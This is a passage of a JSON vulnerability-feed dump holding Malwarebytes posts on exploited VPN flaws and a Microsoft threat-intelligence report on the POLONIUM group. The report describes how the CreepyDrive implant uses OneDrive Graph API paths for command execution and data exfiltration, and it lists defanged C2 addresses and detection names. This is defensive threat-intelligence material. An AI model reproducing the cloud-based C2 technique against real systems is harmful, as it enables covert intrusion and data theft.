"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T15:37:43", "type": "malwarebytes", "title": "500,000 Fortinet VPN credentials exposed: Turn off, patch, reset passwords", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T15:37:43", "id": "MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/500000-fortinet-vpn-credentials-exposed-turn-off-patch-reset-passwords/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say &quot;I told you so&quot;, but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea&#x27;s state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers&#x27; IP addresses was blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can&#x27;t rule out a zero-day, that fact that this wasn&#x27;t mentioned, and that the system was updated in response, suggests it wasn&#x27;t. It certainly doesn&#x27;t need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with year the CVE was issued. What&#x27;s most striking about the NSA&#x27;s list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories&#x27; executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won&#x27;t be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-06-06T10:57:29", "description": "Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM. The associated indicators and tactics were used by the OneDrive team to improve detection of attack activity and disable offending actor accounts. To further address this abuse, Microsoft has suspended more than 20 malicious OneDrive applications created by POLONIUM actors, notified affected organizations, and deployed a series of security intelligence updates that will quarantine tools developed by POLONIUM operators. Our goal with this blog is to help deter future activity by exposing and sharing the POLONIUM tactics with the community at large.\n\nMSTIC assesses with high confidence that POLONIUM represents an operational group based in Lebanon. We also assess with moderate confidence that the observed activity was coordinated with other actors affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques. Such collaboration or direction from Tehran would align with a string of revelations since late 2020 that the Government of Iran is using third parties to carry out cyber operations on their behalf, likely to enhance Iran\u2019s plausible deniability.\n\nPOLONIUM has targeted or compromised more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months. This actor has deployed unique tools that abuse legitimate cloud services for command and control (C2) across most of their victims. POLONIUM was observed creating and using legitimate OneDrive accounts, then utilizing those accounts as C2 to execute part of their attack operation. This activity does not represent any security issues or vulnerabilities on the OneDrive platform. In addition, MSTIC does not, at present, see any links between this activity and other publicly documented groups linked to Lebanon like Volatile Cedar. This blog will also expose further details that show Iranian threat actors may be collaborating with proxies to operationalize their attacks. Microsoft continues to work across its platforms to identify abuse, take down malicious activity, and implement new proactive protections to discourage malicious actors from using our services.\n\nAs with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.\n\n## Observed actor activity\n\nSince February 2022, POLONIUM has been observed primarily targeting organizations in Israel with a focus on critical manufacturing, IT, and Israel\u2019s defense industry. In at least one case, POLONIUM\u2019s compromise of an IT company was used to target a downstream aviation company and law firm in a supply chain attack that relied on service provider credentials to gain access to the targeted networks. Multiple manufacturing companies they targeted also serve Israel\u2019s defense industry, indicating a POLONIUM tactic that follows an increasing trend by many actors, including among several Iranian groups, of targeting service provider access to gain downstream access. Observed victim organizations were in the following sectors: critical manufacturing, information technology, transportation systems, defense industrial base, government agencies and services, food and agriculture, financial services, healthcare and public health, and other business types.\n\n### POLONIUM TTPs shared with Iran-based nation-state actors\n\nMSTIC assesses with moderate confidence that POLONIUM is coordinating its operations with multiple tracked actor groups affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based on victim overlap and the following common techniques and tooling:\n\n * **Common unique victim targeting: **MSTIC has observed POLONIUM active on or targeting multiple victims that MERCURY previously compromised. According to the [US Cyber Command](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), MuddyWater, a group we track as MERCURY, \u201cis a subordinate element within the Iranian Ministry of Intelligence and Security.\u201d\n * **Evidence of possible \u201chand-off\u201d operations:** The uniqueness of the victim organizations suggests a convergence of mission requirements with MOIS. It may also be evidence of a \u2018hand-off\u2019 operational model where MOIS provides POLONIUM with access to previously compromised victim environments to execute new activity. MSTIC continues to monitor both actors to further verify this \u2018hand-off\u2019 hypothesis.\n * **Use of OneDrive for C2: ** MSTIC has observed both POLONIUM and DEV-0133 (aka [Lyceum](<https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign>)) using cloud services, including OneDrive, for data exfiltration and command and control. \n * **Use of AirVPN: **Both POLONIUM and DEV-0588 (aka CopyKittens) commonly use AirVPN for operational activity. While use of public VPN services is common across many actor sets, these actors\u2019 specific choice to use AirVPN, combined with the additional overlaps documented above, further supports the moderate confidence assessment that POLONIUM collaborates with MOIS.\n\n### Abuse of cloud services\n\nPOLONIUM has been observed deploying a series of custom implants that utilize cloud services for command and control as well as data exfiltration. MSTIC has observed implants connecting to POLONIUM-owned accounts in OneDrive and Dropbox. These tools are detected as the following malware:\n\n * Trojan:PowerShell/CreepyDrive.A!dha\n * Trojan:PowerShell/CreepyDrive.B!dha\n * Trojan:PowerShell/CreepyDrive.C!dha\n * Trojan:PowerShell/CreepyDrive.D!dha\n * Trojan:PowerShell/CreepyDrive.E!dha\n * Trojan:MSIL/CreepyBox.A!dha\n * Trojan:MSIL/CreepyBox.B!dha\n * Trojan:MSIL/CreepyBox.C!dha\n\nWhile OneDrive performs antivirus scanning on all uploaded content, POLONIUM is not using the cloud service to host their malware. If malware was hosted in the OneDrive account, Microsoft Defender Antivirus detections would block it. Instead, they are interacting with the cloud service in the same way that a legitimate customer would. OneDrive is partnering with MSTIC to identify and disable accounts that are linked to known adversary behavior.\n\n### CreepyDrive analysis\n\nThe CreepyDrive implant utilizes a POLONIUM-owned OneDrive storage account for command and control. The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run.\n\nAll web requests by the CreepyDrive implant use the _Invoke-WebRequest_ cmdlet. The implant\u2019s logic is wrapped in a _while true_ loop, ensuring continuous execution of the implant once running. The implant contains no native persistence mechanism; if terminated it would need to be re-executed by the threat actor.\n\nDue to the lack of victim identifiers in the CreepyDrive implant, using the same OneDrive account for multiple victims, while possible, may be challenging. It\u2019s likely that a different threat actor-controlled OneDrive account is used per implant.\n\n##### **Getting an OAuth token**\n\nWhen run, the implant first needs to authenticate with OneDrive. The threat actor incorporated a refresh token within the implant. Refresh tokens are part of the Open Authorization 2 (OAuth) specification, allowing a new OAuth token to be issued when it expires. There are several mechanisms that make token theft difficult, including the use of the trusted platform module (TPM) to protect secrets. More information on these mechanisms can be found [here](<https://docs.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token>).\n\nIn this instance, the protection settings tied to the OneDrive account are fully controlled by the threat actor, allowing them to disable protections that prevent the theft of the token and client secrets. As the threat actor is in full control of all secrets and key material associated with the account, their sign-in activity looks like legitimate customer behavior and is thus challenging to detect.\n\nThis token and client secret are transmitted in the body of request to a legitimate Microsoft endpoint to generate an OAuth token:\n \n \n https[://]login.microsoftonline.com/consumers/oauth2/v2.0/token\n\nThis request provides the requisite OAuth token for the implant to interact with the threat actor-owned OneDrive account. Using this OAuth token, the implant makes a request to the following Microsoft Graph API endpoint to access the file _data.txt_:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/data.txt:/content\n\nThe file _data.txt_ acts as the primary tasking mechanism for the implant, providing three branches of execution.\n\n**Upload**\n\nThe first branch is triggered when the word \u201cupload\u201d is provided in the response. This response payload also contains two additional elements: a local file path to upload, and what is likely a threat actor-defined remote file name to upload the local file into. The request is structured as follows:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Uploaded/???:/content\n\n**Download**\n\nThe second branch is triggered when the word \u201cdownload\u201d is provided in the response. This response payload contains a file name to download from the threat actor-owned OneDrive account. The request is structured as follows:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Downloaded/???:/content\n\n**Execute**\n\nThis branch is triggered when no command is provided in the response. The response payload can contain either an array of commands to execute or file paths to files previously downloaded by the implant. The threat actor can also provide a mixture of individual commands and file paths.\n\nEach value from the array is passed individually into the below custom function, which uses the _Invoke-Expression_ cmdlet to run commands:\n\n\n\nThe output of each executed command is aggregated and then written back to the following location in the threat actor-owned OneDrive account:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/response.json:/content\n\nDuring the execution of this mechanism, the threat actor resets the content of the original tasking file _data.txt_ with the following request:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/data.txt:/content\n\nFinally, the CreepyDrive implant sleeps, re-executing in a loop until the process is terminated.\n\n### Use of custom implant\n\nPOLONIUM has also been observed deploying a custom PowerShell implant detected as Backdoor:PowerShell/CreepySnail.B!dha. The C2s for observed CreepySnail implants include:\n\n * 135[.]125[.]147[.]170:80\n * 185[.]244[.]129[.]79:63047\n * 185[.]244[.]129[.]79:80\n * 45[.]80[.]149[.]108:63047\n * 45[.]80[.]149[.]108:80\n * 45[.]80[.]149[.]57:63047\n * 45[.]80[.]149[.]68:63047\n * 45[.]80[.]149[.]71:80\n\nThe code below demonstrates how the CreepySnail PowerShell implant, once deployed on a target network, attempts to authenticate using stolen credentials and connect to POLONIUM C2 for further actions on objectives, such as data exfiltration or further abuse as C2.\n\n  \n\n### Use of commodity tools\n\nPOLONIUM has also been observed dropping a secondary payload via their OneDrive implant. POLONIUM used a common SSH tool for automating interactive sign-ins called _plink_ to set up a redundant tunnel from the victim environment to the attacker-controlled infrastructure.\n\nThe observed C2 IP addresses for POLONIUM plink tunnels include:\n\n * 185[.]244[.]129 [.]109\n * 172[.]96[.]188[.]51\n * 51[.]83 [.]246 [.]73\n\n### Exploitation\n\nWhile we continue to pursue confirmation of how POLONIUM gained initial access to many of their victims, MSTIC notes that approximately 80% of the observed victims beaconing to _graph.microsoft.com_ were running Fortinet appliances. This suggests, but does not definitively prove, that POLONIUM compromised these Fortinet devices by exploiting the [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) vulnerability to gain access to the compromised organizations.\n\n### IT supply chain attacks\n\nIn one case, POLONIUM compromised a cloud service provider based in Israel and likely used this access to compromise downstream customers of the service provider. Specifically, MSTIC observed that POLONIUM pivoted through the service provider and gained access to a law firm and an aviation company in Israel. The tactic of leveraging IT products and service providers to gain access to downstream customers remains a favorite of Iranian actors and their proxies.\n\nMicrosoft will continue to monitor ongoing activity from POLONIUM and the other Iranian MOIS-affiliated actors discussed in this blog and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended customer actions\n\nThe techniques used by the actor described in the \u201cObserved actor activity\u201d section can be mitigated by adopting the security considerations provided below:\n\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion. [Microsoft Sentinel](<https://azure.microsoft.com/services/microsoft-sentinel/#overview>) queries are provided in the advanced hunting section below.\n * Confirm that Microsoft Defender Antivirus is updated to [security intelligence update 1.365.40.0 or later](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/manage-updates-baselines-microsoft-defender-antivirus>), or ensure that [cloud protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus>) is turned on, to detect the related indicators.\n * Block in-bound traffic from IPs specified in the \u201cIndicators of compromise\u201d table.\n * Review all authentication activity for remote access infrastructure (VPNs), with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use passwordless solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure your accounts.\n * For customers that have relationships with service providers, [review and audit partner relationships](<https://docs.microsoft.com/microsoft-365/commerce/manage-partners?view=o365-worldwide>) to minimize any unnecessary permissions between your organization and upstream providers. Microsoft recommends immediately removing access for any partner relationships that look unfamiliar or have not yet been audited.\n\n## Indicators of compromise (IOCs)\n\nThe below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\n**Indicator**| **Type**| **Description** \n---|---|--- \n135[.]125[.]147[.]170:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]79:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]79:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]108:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]108:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]57:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]68:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]71:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]109| IPv4 address| C2 for POLONIUM plink tunnels \n172[.]96[.]188[.]51| IPv4 address| C2 for POLONIUM plink tunnels \n51[.]83[.]246[.]73| IPv4 address| C2 for POLONIUM plink tunnels \nTrojan:PowerShell/CreepyDrive.A!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.B!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.C!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.D!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.E!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.A!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.B!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.C!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyRing.A!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyWink.B!dha| Tool| Custom implant signature \nBackdoor:PowerShell/CreepySnail.B!dha| Tool| Custom implant signature \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft 365 Defender\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by POLONIUM starting from signature build 1.365.40.0 as the following:\n\n * Trojan:PowerShell/CreepyDrive.A!dha\n * Trojan:PowerShell/CreepyDrive.B!dha\n * Trojan:PowerShell/CreepyDrive.C!dha\n * Trojan:PowerShell/CreepyDrive.D!dha\n * Trojan:PowerShell/CreepyDrive.E!dha\n * Trojan:MSIL/CreepyBox.A!dha\n * Trojan:MSIL/CreepyBox.B!dha\n * Trojan:MSIL/CreepyBox.C!dha\n * Trojan:MSIL/CreepyRing.A!dha\n * Trojan:MSIL/CreepyWink.B!dha\n * Backdoor:PowerShell/CreepySnail.B!dha\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of possible attack. These alerts are not necessarily an indication of POLONIUM compromise:\n\n * POLONIUM Actor Activity Detected\n * PowerShell made a suspicious network connection\n * Suspicious behavior by powershell.exe was observed\n * Hidden dual-use tool launch attempt\n * Outbound connection to non-standard port\n\n**Microsoft Defender for Cloud Apps**\n\nThe OAuth apps that were created in the victim tenants were created with only two specific scope of permissions: _offline_access_ and _Files.ReadWrite.All_. These applications were set to serve multi-tenant and performed only OneDrive operations. Applications accessed OneDrive workload via the Graph API, where most calls to the API from the application were made as search activities, with a few edit operations also observed.\n\nApp made numerous searches and edits in OneDrive\n\nApp governance, an add-on to Microsoft Defender for Cloud Apps, detects malicious OAuth applications that make numerous searches and edits in OneDrive. [Learn how to investigate anomaly detection alerts](<https://docs.microsoft.com/en-us/defender-cloud-apps/app-governance-anomaly-detection-alerts#app-made-numerous-searches-and-edits-in-onedrive>) in Microsoft Defender for Cloud Apps.\n\nMicrosoft Defender for Cloud Apps alert for malicious OAuth apps\n\n## Advanced hunting queries\n\n### Microsoft Sentinel\n\n#### Identify POLONIUM IOCs\n\nThis query identifies POLONIUM network IOCs within available Azure Sentinel network logging:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/POLONIUMIPIoC.yaml>\n\n#### Detect CreepySnail static URI parameters\n\nThe CreepySnail tool utilizes static URI parameters that can be detected using the following 